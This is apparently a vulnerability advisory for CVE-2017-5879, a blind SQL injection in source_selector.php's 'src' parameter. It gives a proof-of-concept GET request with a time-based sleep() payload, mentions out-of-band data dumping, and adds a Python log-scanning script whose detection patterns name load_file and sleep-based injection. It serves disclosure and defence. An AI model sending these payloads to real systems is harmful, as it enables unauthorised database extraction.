This is a blind SQL injection that can be exploited by un-authenticated users via an HTTP GET request and which can be used to dump database data out to a malicious server, using an out-of-band technique, such as select_loadfile(). The vulnerability affects source_selector.php and the following parameter: src.
PoC example:
```
GET /source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f\'%2b(select*from(select(sleep(2)))a)%2b\' HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
```
CVE-2017-5879
How to fix: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
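A log-triage check for the request shape shown in the PoC, added here as an example and not part of the original report or the project's code: it flags requests to source_selector.php whose decoded src value falls outside an allowlist. The log lines are constructed, and the allowlist pattern, the marker list and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = r"""
203.0.113.7 - - [10/Feb/2017:10:01:02 +0000] "GET /source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f HTTP/1.1" 200 5120
203.0.113.9 - - [10/Feb/2017:10:01:05 +0000] "GET /source_selector.php?controller=blog&action=showall&src=@random4d4c8bfba590f\'%2b(select*from(select(sleep(2)))a)%2b\' HTTP/1.1" 200 5120
203.0.113.9 - - [10/Feb/2017:10:01:09 +0000] "GET /index.php?src=a'b HTTP/1.1" 200 900
""".strip().splitlines()

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate src is an optional '@' plus letters, digits, '_' or '-'.
SAFE_SRC = re.compile(r'^@?[A-Za-z0-9_-]+$')
# Keywords typical of time-based and out-of-band blind SQL injection (assumed list).
MARKERS = {
    "time-based": re.compile(r'\b(sleep|benchmark)\s*\(', re.I),
    "out-of-band": re.compile(r'\b(load_file|into\s+outfile)\b', re.I),
    "subquery": re.compile(r'\(\s*select\b', re.I),
}

def classify_src(value):
    """Return [] for a well-formed src, else the reasons it is suspicious."""
    if SAFE_SRC.match(value):
        return []
    hits = [name for name, rx in MARKERS.items() if rx.search(value)]
    return hits or ["malformed"]

def scan(lines, path="/source_selector.php"):
    """Return (client_ip, decoded_src, reasons) for suspicious requests to `path`."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs percent-decodes the value, so %2b and similar are normalised first.
        for value in parse_qs(url.query, keep_blank_values=True).get("src", []):
            reasons = classify_src(value)
            if reasons:
                findings.append((ip, value, reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allowlist can be enforced on the server before the value reaches any query, in addition to the parameterized queries the linked cheat sheet describes.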